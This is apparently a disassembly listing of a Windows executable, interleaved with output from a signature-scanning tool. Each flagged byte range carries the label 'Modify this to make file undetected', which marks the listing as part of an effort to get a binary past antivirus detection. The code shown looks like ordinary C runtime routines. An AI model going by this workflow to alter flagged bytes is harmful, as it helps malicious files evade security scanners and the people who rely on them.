0x2538: 0x00403138 cc int3
0x2539: 0x00403139 cc int3
0x253a: 0x0040313a cc int3
0x253b: 0x0040313b cc int3
0x253c: 0x0040313c cc int3
0x253d: 0x0040313d cc int3
0x253e: 0x0040313e cc int3
0x253f: 0x0040313f cc int3
0x2540: 0x00403140 a1c8ac4100 mov eax, dword [0x41acc8] ; [0x41acc8:4]=0
0x2545: 0x00403145 56 push esi
0x2546: 0x00403146 6a03 push 3 ; 3
0x2548: 0x00403148 5e pop esi
0x2549: 0x00403149 85c0 test eax, eax
0x254b: < 0x0040314b 7507 jne 0x403154
0x254d: 0x0040314d b800020000 mov eax, 0x200 ; 512
0x2552: < 0x00403152 eb06 jmp 0x40315a
0x2554: ; CODE XREF from case.default.0x402e15 @ +0x90(x)
0x2554: > 0x00403154 3bc6 cmp eax, esi
0x2556: < 0x00403156 7d07 jge 0x40315f
0x2558: 0x00403158 8bc6 mov eax, esi
0x255a: ; CODE XREF from case.default.0x402e15 @ +0x97(x)
0x255a: > 0x0040315a a3c8ac4100 mov dword [0x41acc8], eax ; [0x41acc8:4]=0
0x255f: ; CODE XREF from case.default.0x402e15 @ +0x9b(x)
0x255f: > 0x0040315f 6a04 push 4 ; 4
0x2561: 0x00403161 50 push eax
0x2562: 0x00403162 e8573a0000 call fcn.00406bbe
0x2567: 0x00403167 6a00 push 0
0x2569: 0x00403169 a3ccac4100 mov dword [0x41accc], eax ; [0x41accc:4]=0
0x256e: 0x0040316e e8a83a0000 call fcn.00406c1b
0x2573: 0x00403173 83c40c add esp, 0xc
0x2576: 0x00403176 833dccac4100. cmp dword [0x41accc], 0 ; [0x41accc:4]=0
0x257d: < 0x0040317d 752b jne 0x4031aa
0x257f: 0x0040317f 6a04 push 4 ; 4
0x2581: 0x00403181 56 push esi
0x2582: 0x00403182 8935c8ac4100 mov dword [0x41acc8], esi ; [0x41acc8:4]=0
0x2588: 0x00403188 e8313a0000 call fcn.00406bbe
0x258d: 0x0040318d 6a00 push 0
0x258f: 0x0040318f a3ccac4100 mov dword [0x41accc], eax ; [0x41accc:4]=0
0x2594: 0x00403194 e8823a0000 call fcn.00406c1b
0x2599: 0x00403199 83c40c add esp, 0xc
0x259c: 0x0040319c 833dccac4100. cmp dword [0x41accc], 0 ; [0x41accc:4]=0
0x25a3: < 0x004031a3 7505 jne 0x4031aa
0x25a5: 0x004031a5 83c8ff or eax, 0xffffffff ; -1
0x25a8: 0x004031a8 5e pop esi
0x25a9: 0x004031a9 c3 ret
0x25aa: ; CODE XREFS from case.default.0x402e15 @ +0xc2(x), +0xe8(x)
0x25aa: > 0x004031aa 57 push edi
0x25ab: 0x004031ab 33ff xor edi, edi
0x25ad: 0x004031ad be40a04100 mov esi, 0x41a040
0x25b2: ; CODE XREF from case.default.0x402e15 @ +0x146(x)
0x25b2: > 0x004031b2 6a00 push 0
0x25b4: 0x004031b4 68a00f0000 push 0xfa0 ; 4000
0x25b9: 0x004031b9 8d4620 lea eax, [esi + 0x20]
0x25bc: 0x004031bc 50 push eax
0x25bd: 0x004031bd e8c73d0000 call fcn.00406f89
0x25c2: 0x004031c2 a1ccac4100 mov eax, dword [0x41accc] ; [0x41accc:4]=0
0x25c7: 0x004031c7 8bd7 mov edx, edi
0x25c9: 0x004031c9 c1fa06 sar edx, 6
0x25cc: 0x004031cc 8934b8 mov dword [eax + edi*4], esi
0x25cf: 0x004031cf 8bc7 mov eax, edi
0x25d1: 0x004031d1 83e03f and eax, 0x3f ; 63
0x25d4: 0x004031d4 6bc838 imul ecx, eax, 0x38
0x25d7: 0x004031d7 8b049520b041. mov eax, dword [edx*4 + 0x41b020]
0x25de: 0x004031de 8b440818 mov eax, dword [eax + ecx + 0x18]
0x25e2: 0x004031e2 83f8ff cmp eax, 0xffffffff
0x25e5: < 0x004031e5 7409 je 0x4031f0
0x25e7: 0x004031e7 83f8fe cmp eax, 0xfffffffe
0x25ea: < 0x004031ea 7404 je 0x4031f0
0x25ec: 0x004031ec 85c0 test eax, eax
0x25ee: < 0x004031ee 7507 jne 0x4031f7
0x25f0: ; CODE XREFS from case.default.0x402e15 @ +0x12a(x), +0x12f(x)
0x25f0: > 0x004031f0 c74610feffff. mov dword [esi + 0x10], 0xfffffffe ; [0xfffffffe:4]=-1 ; 4294967294
0x25f7: ; CODE XREF from case.default.0x402e15 @ +0x133(x)
0x25f7: > 0x004031f7 83c638 add esi, 0x38 ; 56
0x25fa: 0x004031fa 47 inc edi
0x25fb: 0x004031fb 81fee8a04100 cmp esi, 0x41a0e8
0x2601: < 0x00403201 75af jne 0x4031b2
0x2603: 0x00403203 5f pop edi
0x2604: 0x00403204 33c0 xor eax, eax
0x2606: 0x00403206 5e pop esi
0x2607: 0x00403207 c3 ret
0x2608: ; CALL XREF from fcn.004011c0 @ 0x4011cd(x)
0x2608: ; CALL XREFS from fcn.00408e05 @ 0x408e0c(x), 0x408e19(x)
0x2608: ; CALL XREFS from fcn.00408e40 @ 0x408e5c(x), 0x408e71(x)
0x2608: 16: fcn.00403208 (signed int arg_8h);
0x2608: ; arg signed int arg_8h @ ebp+0x8
0x2608: 0x00403208 8bff mov edi, edi
0x260a: 0x0040320a 55 push ebp
0x260b: 0x0040320b 8bec mov ebp, esp
0x260d: 0x0040320d 6b450838 imul eax, dword [arg_8h], 0x38
0x2611: 0x00403211 0540a04100 add eax, 0x41a040
0x2616: 0x00403216 5d pop ebp
0x2617: 0x00403217 c3 ret
0x2618: 0x00403218 8bff mov edi, edi
0x261a: 0x0040321a 56 push esi
0x261b: 0x0040321b e8d8410000 call fcn.004073f8
0x2620: 0x00403220 e89e3e0000 call fcn.004070c3
0x2625: 0x00403225 33f6 xor esi, esi
0x2627: ; CODE XREF from fcn.00403208 @ +0x45(x)
0x2627: 0x00403227 a1ccac4100 mov eax, dword [0x41accc] ; [0x41accc:4]=0
0x262c: 0x0040322c ff3406 push dword [esi + eax]
0x262f: 0x0040322f e8 invalid
0x2630: 0x00403230 cd41 int 0x41

Match 30: 9830 (size: 170)

Dominant. Modify this to make file undetected

.text

00002666   55 8B EC 8B 45 08 83 C0 20 50 FF 15 50 20 41 00    U...E... P..P A.
00002676   5D C3 8B FF 55 8B EC 8B 45 08 83 C0 20 50 FF 15    ]...U...E... P..
00002686   54 20 41 00 5D C3 6A 0C 68 68 8F 41 00 E8 58 ED    T A.].j.hh.A..X.
00002696   FF FF 83 65 E4 00 8B 45 08 FF 30 E8 BE FF FF FF    ...e...E..0.....
000026A6   59 83 65 FC 00 8B 4D 0C E8 34 06 00 00 8B F0 89    Y.e...M..4......
000026B6   75 E4 C7 45 FC FE FF FF FF E8 17 00 00 00 8B C6    u..E............
000026C6   8B 4D F0 64 89 0D 00 00 00 00 59 5F 5E 5B C9 C2    .M.d......Y_^[..
000026D6   0C 00 8B 75 E4 8B 45 10 FF 30 E8 93 FF FF FF 59    ...u..E..0.....Y
000026E6   C3 8B FF 55 8B EC 81 EC 84 04 00 00 A1 04 A0 41    ...U...........A
000026F6   00 33 C5 89 45 FC 83 7D 18 00 8B 45 10 53 8B 5D    .3..E..}...E.S.]
00002706   14 89 85 A0 FB FF FF 75 18 E8                      .......u..

0x265a: 0x0040325a 8325ccac4100. and dword [0x41accc], 0 ; [0x41accc:4]=0
0x2661: 0x00403261 59 pop ecx
0x2662: 0x00403262 5e pop esi
0x2663: 0x00403263 c3 ret
0x2664: ; CALL XREF from fcn.0040328c @ 0x4032a1(x)
0x2664: ; CALL XREF from fcn.0040716e @ 0x40717f(x)
0x2664: ; CALL XREF from fcn.0040b912 @ 0x40b955(x)
0x2664: 20: fcn.00403264 (LPCRITICAL_SECTION lpCriticalSection);
0x2664: ; arg LPCRITICAL_SECTION lpCriticalSection @ ebp+0x8
0x2664: 0x00403264 8bff mov edi, edi
0x2666: 0x00403266 55 push ebp
0x2667: 0x00403267 8bec mov ebp, esp
0x2669: 0x00403269 8b4508 mov eax, dword [lpCriticalSection]
0x266c: 0x0040326c 83c020 add eax, 0x20 ; 32
0x266f: 0x0040326f 50 push eax ; LPCRITICAL_SECTION lpCriticalSection
0x2670: 0x00403270 ff1550204100 call dword [sym.imp.KERNEL32.dll_EnterCriticalSection] ; 0x412050 ; "4\x96\x01" ; VOID EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
0x2676: 0x00403276 5d pop ebp
0x2677: 0x00403277 c3 ret
0x2678: ; CALL XREF from fcn.004032db @ 0x4032e0(x)
0x2678: ; CALL XREF from fcn.004071ee @ 0x4071f3(x)
0x2678: ; CALL XREF from fcn.0040b98c @ 0x40b98f(x)
0x2678: 20: fcn.00403278 (LPCRITICAL_SECTION lpCriticalSection);
0x2678: ; arg LPCRITICAL_SECTION lpCriticalSection @ ebp+0x8
0x2678: 0x00403278 8bff mov edi, edi
0x267a: 0x0040327a 55 push ebp
0x267b: 0x0040327b 8bec mov ebp, esp
0x267d: 0x0040327d 8b4508 mov eax, dword [lpCriticalSection]
0x2680: 0x00403280 83c020 add eax, 0x20 ; 32
0x2683: 0x00403283 50 push eax ; LPCRITICAL_SECTION lpCriticalSection
0x2684: 0x00403284 ff1554204100 call dword [sym.imp.KERNEL32.dll_LeaveCriticalSection] ; 0x412054 ; "L\x96\x01" ; VOID LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
0x268a: 0x0040328a 5d pop ebp
0x268b: 0x0040328b c3 ret
0x268c: ; CALL XREF from fcn.00404ec0 @ 0x404f3c(x)
0x268c: 76: fcn.0040328c (int32_t arg_8h, int32_t arg_ch);
0x268c: ; arg int32_t arg_8h @ ebp+0x8
0x268c: ; arg int32_t arg_ch @ ebp+0xc
0x268c: ; var int32_t var_4h @ ebp-0x4
0x268c: ; var int32_t var_10h @ ebp-0x10
0x268c: ; var int32_t var_1ch @ ebp-0x1c
0x268c: 0x0040328c 6a0c push 0xc ; 12
0x268e: 0x0040328e 68688f4100 push 0x418f68
0x2693: 0x00403293 e858edffff call fcn.00401ff0
0x2698: 0x00403298 8365e400 and dword [var_1ch], 0
0x269c: 0x0040329c 8b4508 mov eax, dword [arg_8h]
0x269f: 0x0040329f ff30 push dword [eax]
0x26a1: 0x004032a1 e8beffffff call fcn.00403264
0x26a6: 0x004032a6 59 pop ecx
0x26a7: 0x004032a7 8365fc00 and dword [var_4h], 0
0x26ab: 0x004032ab 8b4d0c mov ecx, dword [arg_ch]
0x26ae: 0x004032ae e834060000 call fcn.004038e7
0x26b3: 0x004032b3 8bf0 mov esi, eax
0x26b5: 0x004032b5 8975e4 mov dword [var_1ch], esi
0x26b8: 0x004032b8 c745fcfeffff. mov dword [var_4h], 0xfffffffe ; 4294967294
0x26bf: 0x004032bf e817000000 call fcn.004032db
0x26c4: 0x004032c4 8bc6 mov eax, esi
0x26c6: 0x004032c6 8b4df0 mov ecx, dword [var_10h]
0x26c9: 0x004032c9 64890d000000. mov dword fs:[0], ecx
0x26d0: 0x004032d0 59 pop ecx
0x26d1: 0x004032d1 5f pop edi
0x26d2: 0x004032d2 5e pop esi
0x26d3: 0x004032d3 5b pop ebx
0x26d4: 0x004032d4 c9 leave
0x26d5: 0x004032d5 c20c00 ret 0xc
0x26d8: 0x004032d8 8b75e4 mov esi, dword [ebp - 0x1c]
0x26db: ; CALL XREF from fcn.0040328c @ 0x4032bf(x)
0x26db: 12: fcn.004032db (int32_t arg_10h);
0x26db: ; arg int32_t arg_10h @ ebp+0x10
0x26db: 0x004032db 8b4510 mov eax, dword [arg_10h]
0x26de: 0x004032de ff30 push dword [eax] ; LPCRITICAL_SECTION lpCriticalSection
0x26e0: 0x004032e0 e893ffffff call fcn.00403278
0x26e5: 0x004032e5 59 pop ecx
0x26e6: 0x004032e6 c3 ret
0x26e7: ; CALL XREF from fcn.00404f43 @ 0x404f5d(x)
0x26e7: 391: fcn.004032e7 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h, int32_t arg_14h, uint32_t arg_18h, int32_t arg_1ch, int32_t arg_20h);
0x26e7: ; arg int32_t arg_8h @ ebp+0x8
0x26e7: ; arg int32_t arg_ch @ ebp+0xc
0x26e7: ; arg int32_t arg_10h @ ebp+0x10
0x26e7: ; arg int32_t arg_14h @ ebp+0x14
0x26e7: ; arg uint32_t arg_18h @ ebp+0x18
0x26e7: ; arg int32_t arg_1ch @ ebp+0x1c
0x26e7: ; arg int32_t arg_20h @ ebp+0x20
0x26e7: ; var int32_t var_4h @ ebp-0x4
0x26e7: ; var int32_t var_ch @ ebp-0xc
0x26e7: ; var int32_t var_41ch @ ebp-0x41c
0x26e7: ; var int32_t var_45ch @ ebp-0x45c
0x26e7: ; var int32_t var_460h @ ebp-0x460
0x26e7: ; var int32_t var_464h @ ebp-0x464
0x26e7: ; var int32_t var_468h @ ebp-0x468
0x26e7: ; var int32_t var_46ch @ ebp-0x46c
0x26e7: ; var int32_t var_470h @ ebp-0x470
0x26e7: ; var int32_t var_474h @ ebp-0x474
0x26e7: ; var uint32_t var_478h @ ebp-0x478
0x26e7: ; var int32_t var_480h @ ebp-0x480
0x26e7: ; var int32_t var_484h @ ebp-0x484
0x26e7: 0x004032e7 8bff mov edi, edi
0x26e9: 0x004032e9 55 push ebp
0x26ea: 0x004032ea 8bec mov ebp, esp
0x26ec: 0x004032ec 81ec84040000 sub esp, 0x484
0x26f2: 0x004032f2 a104a04100 mov eax, dword [0x41a004] ; [0x41a004:4]=0xbb40e64e
0x26f7: 0x004032f7 33c5 xor eax, ebp
0x26f9: 0x004032f9 8945fc mov dword [var_4h], eax
0x26fc: 0x004032fc 837d1800 cmp dword [arg_18h], 0
0x2700: 0x00403300 8b4510 mov eax, dword [arg_10h]
0x2703: 0x00403303 53 push ebx
0x2704: 0x00403304 8b5d14 mov ebx, dword [arg_14h]
0x2707: 0x00403307 8985a0fbffff mov dword [var_460h], eax
0x270d: < 0x0040330d 7518 jne 0x403327
0x270f: ; CODE XREF from fcn.004032e7 @ 0x40332d(x)
0x270f: 0x0040330f e897380000 call fcn.00406bab
0x2714: 0x00403314 c70016000000 mov dword [eax], 0x16 ; [0x16:4]=-1 ; 22
0x271a: 0x0040331a e8cf370000 call fcn.00406aee
0x271f: 0x0040331f 83 invalid

Match 31: 11156 (size: 544)

Dominant. Modify this to make file undetected

.text

00002B94   06 46 3B 75 10 7C EB 5F 5B 5E 5D C3 8B FF 55 8B    .F;u.|._[^]...U.
00002BA4   EC 51 33 D2 89 4D FC 89 11 33 C0 89 51 04 89 51    .Q3..M...3..Q..Q
00002BB4   08 89 51 0C 66 89 41 32 8B C1 89 51 10 89 51 14    ..Q.f.A2...Q..Q.
00002BC4   89 51 18 89 51 1C 89 51 20 89 51 24 89 51 28 88    .Q..Q..Q .Q$.Q(.
00002BD4   51 30 89 51 38 88 51 3C 89 91 40 04 00 00 89 91    Q0.Q8.Q<..@.....
00002BE4   44 04 00 00 C9 C3 8B FF 55 8B EC 56 8B F1 E8 A9    D.......U..V....
00002BF4   FF FF FF 8B 45 08 8B 00 89 86 48 04 00 00 8B 45    ....E.....H....E
00002C04   0C 89 06 8B 45 10 89 46 04 8B 45 18 89 46 08 8B    ....E..F..E..F..
00002C14   45 14 89 46 10 8B 45 1C 89 46 14 8B C6 5E 5D C2    E..F..E..F...^].
00002C24   18 00 8B FF 55 8B EC 53 57 8B F9 8B 4D 08 C6 47    ....U..SW...M..G
00002C34   0C 00 8D 5F 04 85 C9 74 09 8B 01 89 03 8B 41 04    ..._...t......A.
00002C44   EB 15 83 3D 20 AF 41 00 00 75 11 A1 F0 A1 41 00    ...= .A..u....A.
00002C54   89 03 A1 F4 A1 41 00 89 43 04 EB 41 56 E8 26 46    .....A..C..AV.&F
00002C64   00 00 89 07 8D 77 08 53 50 8B 48 4C 89 0B 8B 48    .....w.SP.HL...H
00002C74   48 89 0E E8 62 48 00 00 56 FF 37 E8 87 48 00 00    H...bH..V.7..H..
00002C84   8B 0F 83 C4 10 8B 81 50 03 00 00 5E A8 02 75 0D    .......P...^..u.
00002C94   83 C8 02 89 81 50 03 00 00 C6 47 0C 01 8B C7 5F    .....P....G...._
00002CA4   5B 5D C2 04 00 8B FF 56 8B F1 FF B6 04 04 00 00    [].....V........
00002CB4   E8 62 33 00 00 83 A6 04 04 00 00 00 59 5E C3 8B    .b3.........Y^..
00002CC4   FF 55 8B EC 56 8B F1 FF 36 E8 49 33 00 00 8B 55    .U..V...6.I3...U
00002CD4   08 83 26 00 59 8B 02 89 06 8B C6 83 22 00 5E 5D    ..&.Y.......".^]
00002CE4   C2 04 00 8B FF 55 8B EC 81 EC 74 04 00 00 A1 04    .....U....t.....
00002CF4   A0 41 00 33 C5 89 45 FC 56 8B F1 57 8B 06 8B 38    .A.3..E.V..W...8
00002D04   57 E8 36 55 00 00 88 85 9C FB FF FF 8B 46 04 59    W.6U.........F.Y
00002D14   8D 8D 8C FB FF FF FF 30 E8 05 FF FF FF 8B 06 8D    .......0........
00002D24   8D A4 FB FF FF 8B 00 89 85 A0 FB FF FF 8B 46 10    ..............F.
00002D34   FF 30 8D 85 90 FB FF FF 50 8B 46 0C FF 30 8B 46    .0......P.F..0.F
00002D44   08 FF 70 04 FF 30 8D 85 A0 FB FF FF 50 E8 94 FE    ..p..0......P...
00002D54   FF FF 83 65 F4 00 8D 8D A4 FB FF FF E8 E6 01 00    ...e............
00002D64   00 8D 8D E4 FB FF FF 8B F0 E8 37 FF FF FF 80 BD    ..........7.....
00002D74   98 FB FF FF 00 74 0D 8B 8D 8C FB FF FF 83 A1 50    .....t.........P
00002D84   03 00 00 FD 57 FF B5 9C FB FF FF E8 58 55 00 00    ....W.......XU..
00002D94   59 59 8B 4D FC 8B C6 5F 33 CD 5E E8 35 DD FF FF    YY.M..._3.^.5...
00002DA4   C9 C3 CC CC CC CC CC CC CC CC CC CC 8B FF 55 8B    ..............U.

Match 32: 11768 (size: 136)

Dominant. Modify this to make file undetected

.text

00002DF8   74 08 8A 48 01 40 84 C9 75 EE 8A 48 FF 8B D0 48    t..H.@..u..H...H
00002E08   80 F9 30 75 0C 8D 49 00 8A 48 FF 48 80 F9 30 74    ..0u..I..H.H..0t
00002E18   F7 3A CB 75 03 48 8B FF 8A 0A 8D 40 01 88 08 8D    .:.u.H.....@....
00002E28   52 01 84 C9 75 F2 5B 5D C3 8B FF 55 8B EC 8B 4D    R...u.[]...U...M
00002E38   08 8D 41 E0 66 83 F8 5A 77 0F 8D 41 E0 83 E0 7F    ..A.f..Zw..A....
00002E48   8B 0C C5 3C 2C 41 00 EB 02 33 C9 8B 45 0C 8D 04    ...<,A...3..E...
00002E58   C8 83 E0 7F 8B 04 C5 38 2C 41 00 5D C2 08 00 CC    .......8,A.]....
00002E68   CC CC CC CC CC CC CC CC 8B FF 55 8B EC 8B 45 0C    ..........U...E.
00002E78   53 56 57 8B 30 8B 45 08                            SVW.0.E.

0x2de9: < 0x004039e9 7417 je 0x403a02
0x2deb: < 0x004039eb eb03 jmp 0x4039f0
0x2ded: 0x004039ed 8d4900 lea ecx, [ecx]
0x2df0: ; CODE XREFS from fcn.004039b0 @ 0x4039eb(x), 0x403a00(x)
0x2df0: > 0x004039f0 80f965 cmp cl, 0x65 ; 'e' ; 101
0x2df3: < 0x004039f3 740d je 0x403a02
0x2df5: 0x004039f5 80f945 cmp cl, 0x45 ; 'E' ; 69
0x2df8: < 0x004039f8 7408 je 0x403a02
0x2dfa: 0x004039fa 8a4801 mov cl, byte [eax + 1]
0x2dfd: 0x004039fd 40 inc eax
0x2dfe: 0x004039fe 84c9 test cl, cl
0x2e00: < 0x00403a00 75ee jne 0x4039f0
0x2e02: ; CODE XREFS from fcn.004039b0 @ 0x4039e9(x), 0x4039f3(x), 0x4039f8(x)
0x2e02: > 0x00403a02 8a48ff mov cl, byte [eax - 1]
0x2e05: 0x00403a05 8bd0 mov edx, eax
0x2e07: 0x00403a07 48 dec eax
0x2e08: 0x00403a08 80f930 cmp cl, 0x30 ; '0' ; 48
0x2e0b: < 0x00403a0b 750c jne 0x403a19
0x2e0d: 0x00403a0d 8d4900 lea ecx, [ecx]
0x2e10: ; CODE XREF from fcn.004039b0 @ 0x403a17(x)
0x2e10: > 0x00403a10 8a48ff mov cl, byte [eax - 1]
0x2e13: 0x00403a13 48 dec eax
0x2e14: 0x00403a14 80f930 cmp cl, 0x30 ; '0' ; 48
0x2e17: < 0x00403a17 74f7 je 0x403a10
0x2e19: ; CODE XREF from fcn.004039b0 @ 0x403a0b(x)
0x2e19: > 0x00403a19 3acb cmp cl, bl
0x2e1b: < 0x00403a1b 7503 jne 0x403a20
0x2e1d: 0x00403a1d 48 dec eax
0x2e1e: 0x00403a1e 8bff mov edi, edi
0x2e20: ; CODE XREFS from fcn.004039b0 @ 0x403a1b(x), 0x403a2c(x)
0x2e20: > 0x00403a20 8a0a mov cl, byte [edx]
0x2e22: 0x00403a22 8d4001 lea eax, [eax + 1]
0x2e25: 0x00403a25 8808 mov byte [eax], cl
0x2e27: 0x00403a27 8d5201 lea edx, [edx + 1]
0x2e2a: 0x00403a2a 84c9 test cl, cl
0x2e2c: < 0x00403a2c 75f2 jne 0x403a20
0x2e2e: ; CODE XREF from fcn.004039b0 @ 0x4039e3(x)
0x2e2e: > 0x00403a2e 5b pop ebx
0x2e2f: 0x00403a2f 5d pop ebp
0x2e30: 0x00403a30 c3 ret
0x2e31: ; CALL XREF from fcn.00403b4b @ 0x403ba3(x)
0x2e31: ; CALL XREF from fcn.00403c67 @ 0x403cbf(x)
0x2e31: 54: fcn.00403a31 (int32_t arg_8h, int32_t arg_ch);
0x2e31: ; arg int32_t arg_8h @ ebp+0x8
0x2e31: ; arg int32_t arg_ch @ ebp+0xc
0x2e31: 0x00403a31 8bff mov edi, edi
0x2e33: 0x00403a33 55 push ebp
0x2e34: 0x00403a34 8bec mov ebp, esp
0x2e36: 0x00403a36 8b4d08 mov ecx, dword [arg_8h]
0x2e39: 0x00403a39 8d41e0 lea eax, [ecx - 0x20]
0x2e3c: 0x00403a3c 6683f85a cmp ax, 0x5a ; 'Z' ; 90
0x2e40: < 0x00403a40 770f ja 0x403a51
0x2e42: 0x00403a42 8d41e0 lea eax, [ecx - 0x20]
0x2e45: 0x00403a45 83e07f and eax, 0x7f ; 127
0x2e48: 0x00403a48 8b0cc53c2c41. mov ecx, dword [eax*8 + 0x412c3c]
0x2e4f: < 0x00403a4f eb02 jmp 0x403a53
0x2e51: ; CODE XREF from fcn.00403a31 @ 0x403a40(x)
0x2e51: > 0x00403a51 33c9 xor ecx, ecx
0x2e53: ; CODE XREF from fcn.00403a31 @ 0x403a4f(x)
0x2e53: > 0x00403a53 8b450c mov eax, dword [arg_ch]
0x2e56: 0x00403a56 8d04c8 lea eax, [eax + ecx*8]
0x2e59: 0x00403a59 83e07f and eax, 0x7f ; 127
0x2e5c: 0x00403a5c 8b04c5382c41. mov eax, dword [eax*8 + 0x412c38]
0x2e63: 0x00403a63 5d pop ebp
0x2e64: 0x00403a64 c20800 ret 8
0x2e67: 0x00403a67 cc int3
0x2e68: 0x00403a68 cc int3
0x2e69: 0x00403a69 cc int3
0x2e6a: 0x00403a6a cc int3
0x2e6b: 0x00403a6b cc int3
0x2e6c: 0x00403a6c cc int3
0x2e6d: 0x00403a6d cc int3
0x2e6e: 0x00403a6e cc int3
0x2e6f: 0x00403a6f cc int3
0x2e70: ; CALL XREF from fcn.004046f6 @ 0x4047e7(x)
0x2e70: 101: fcn.00403a70 (int32_t arg_8h, int32_t arg_ch);
0x2e70: ; arg int32_t arg_8h @ ebp+0x8
0x2e70: ; arg int32_t arg_ch @ ebp+0xc
0x2e70: 0x00403a70 8bff mov edi, edi
0x2e72: 0x00403a72 55 push ebp
0x2e73: 0x00403a73 8bec mov ebp, esp
0x2e75: 0x00403a75 8b450c mov eax, dword [arg_ch]
0x2e78: 0x00403a78 53 push ebx
0x2e79: 0x00403a79 56 push esi
0x2e7a: 0x00403a7a 57 push edi
0x2e7b: 0x00403a7b 8b30 mov esi, dword [eax]
0x2e7d: 0x00403a7d 8b4508 mov eax, dword [arg_8h]
0x2e80: 0x00403a80 8bbe94000000 mov edi, dword [esi + 0x94]
0x2e86: 0x00403a86 8a18 mov bl, byte [eax]
0x2e88: 0x00403a88 0fb6cb movzx ecx, bl
0x2e8b: 0x00403a8b 803c3965 cmp byte [ecx + edi], 0x65 ; 'e'
0x2e8f: 0x00403a8f 74 invalid

Match 33: 12108 (size: 272)

Dominant. Modify this to make file undetected

.text

00002F4C   FF 53 56 8B F1 8D 8E 48 04 00 00 E8 51 10 00 00    .SV....H....Q...
00002F5C   84 C0 74 1B 33 DB 39 5E 10 0F 85 BE 00 00 00 E8    ..t.3.9^........
00002F6C   3B 30 00 00 C7 00 16 00 00 00 E8 73 2F 00 00 83    ;0.........s/...
00002F7C   C8 FF 5E 5B C3 89 5E 38 89 5E 1C E9 86 00 00 00    ..^[..^8.^......
00002F8C   83 46 10 02 39 5E 18 0F 8C 90 00 00 00 FF 76 1C    .F..9^........v.
00002F9C   0F B7 46 32 8B CE 50 E8 89 FE FF FF 89 46 1C 83    ..F2..P......F..
00002FAC   F8 08 74 BB 83 F8 07 77 C6 FF 24 85 47 3C 40 00    ..t....w..$.G<@.
00002FBC   8B CE E8 FD 01 00 00 EB 45 83 4E 28 FF 89 5E 24    ........E.N(..^$
00002FCC   88 5E 30 89 5E 20 89 5E 2C 88 5E 3C EB 38 8B CE    .^0.^ .^,.^<.8..
00002FDC   E8 A2 01 00 00 EB 27 8B CE E8 2A 0A 00 00 EB 1E    ......'...*.....
00002FEC   89 5E 28 EB 21 8B CE E8 4B 02 00 00 EB 10 8B CE    .^(.!...K.......
00002FFC   E8 69 02 00 00 EB 07 8B CE E8 50 05 00 00 84 C0    .i........P.....
0000300C   0F 84 69 FF FF FF 8B 46 10 0F B7 00 66 89 46 32    ..i....F....f.F2
0000301C   66 85 C0 0F 85 67 FF FF FF 83 46 10 02 FF 86 50    f....g....F....P
0000302C   04 00 00 83 BE 50 04 00 00 02 0F 85 45 FF FF FF    .....P......E...
0000303C   8B 46 18 E9 3A FF FF FF 8D 49 00 BC 3B 40 00 C5    .F..:....I..;@..
0000304C   3B 40 00 DA 3B 40 00 E3 3B 40 00 EC 3B 40 00 F1    ;@..;@..;@..;@..

0x2f3c: < 0x00403b3c 7506 jne 0x403b44
0x2f3e: 0x00403b3e 85db test ebx, ebx
0x2f40: < 0x00403b40 7402 je 0x403b44
0x2f42: 0x00403b42 891e mov dword [esi], ebx
0x2f44: ; CODE XREFS from fcn.00403ad5 @ 0x403b3c(x), 0x403b40(x)
0x2f44: > 0x00403b44 5f pop edi
0x2f45: 0x00403b45 5e pop esi
0x2f46: 0x00403b46 5b pop ebx
0x2f47: 0x00403b47 c9 leave
0x2f48: 0x00403b48 c20400 ret 4
0x2f4b: ; CALL XREF from fcn.004038e7 @ 0x403960(x)
0x2f4b: 249: fcn.00403b4b ();
0x2f4b: 0x00403b4b 8bff mov edi, edi
0x2f4d: 0x00403b4d 53 push ebx
0x2f4e: 0x00403b4e 56 push esi
0x2f4f: 0x00403b4f 8bf1 mov esi, ecx
0x2f51: 0x00403b51 8d8e48040000 lea ecx, [esi + 0x448]
0x2f57: 0x00403b57 e851100000 call fcn.00404bad
0x2f5c: 0x00403b5c 84c0 test al, al
0x2f5e: < 0x00403b5e 741b je case.default.0x403bb5
0x2f60: 0x00403b60 33db xor ebx, ebx
0x2f62: 0x00403b62 395e10 cmp dword [esi + 0x10], ebx
0x2f65: < 0x00403b65 0f85be000000 jne 0x403c29
0x2f6b: ; CODE XREF from fcn.00403b4b @ 0x403bae(x)
0x2f6b: > 0x00403b6b e83b300000 call fcn.00406bab
0x2f70: 0x00403b70 c70016000000 mov dword [eax], 0x16 ; [0x16:4]=-1 ; 22
0x2f76: 0x00403b76 e8732f0000 call fcn.00406aee
0x2f7b: ;-- default: ; from 0x403bb5
0x2f7b: ; CODE XREFS from fcn.00403b4b @ 0x403b5e(x), 0x403bb3(x), 0x403bb5(x), 0x403c0c(x)
0x2f7b: > 0x00403b7b 83c8ff or eax, 0xffffffff ; -1
0x2f7e: ; CODE XREF from fcn.00403b4b @ 0x403c3f(x)
0x2f7e: > 0x00403b7e 5e pop esi
0x2f7f: 0x00403b7f 5b pop ebx
0x2f80: 0x00403b80 c3 ret
0x2f81: ; CODE XREF from fcn.00403b4b @ 0x403c36(x)
0x2f81: > 0x00403b81 895e38 mov dword [esi + 0x38], ebx
0x2f84: 0x00403b84 895e1c mov dword [esi + 0x1c], ebx
0x2f87: < 0x00403b87 e986000000 jmp 0x403c12
0x2f8c: ; CODE XREF from fcn.00403b4b @ 0x403c1f(x)
0x2f8c: > 0x00403b8c 83461002 add dword [esi + 0x10], 2
0x2f90: 0x00403b90 395e18 cmp dword [esi + 0x18], ebx
0x2f93: < 0x00403b93 0f8c90000000 jl 0x403c29
0x2f99: 0x00403b99 ff761c push dword [esi + 0x1c] ; int32_t arg_ch
0x2f9c: 0x00403b9c 0fb74632 movzx eax, word [esi + 0x32]
0x2fa0: 0x00403ba0 8bce mov ecx, esi
0x2fa2: 0x00403ba2 50 push eax ; int32_t arg_8h
0x2fa3: 0x00403ba3 e889feffff call fcn.00403a31
0x2fa8: 0x00403ba8 89461c mov dword [esi + 0x1c], eax
0x2fab: 0x00403bab 83f808 cmp eax, 8 ; 8
0x2fae: < 0x00403bae 74bb je 0x403b6b
0x2fb0: 0x00403bb0 83f807 cmp eax, 7 ; 7
0x2fb3: < 0x00403bb3 77c6 ja case.default.0x403bb5
0x2fb5: ;-- switch
0x2fb5: 0x00403bb5 ff2485473c40. jmp dword [eax*4 + 0x403c47] ; switch table (8 cases) at 0x403c47
0x2fbc: ;-- case 0: ; from 0x00403bb5
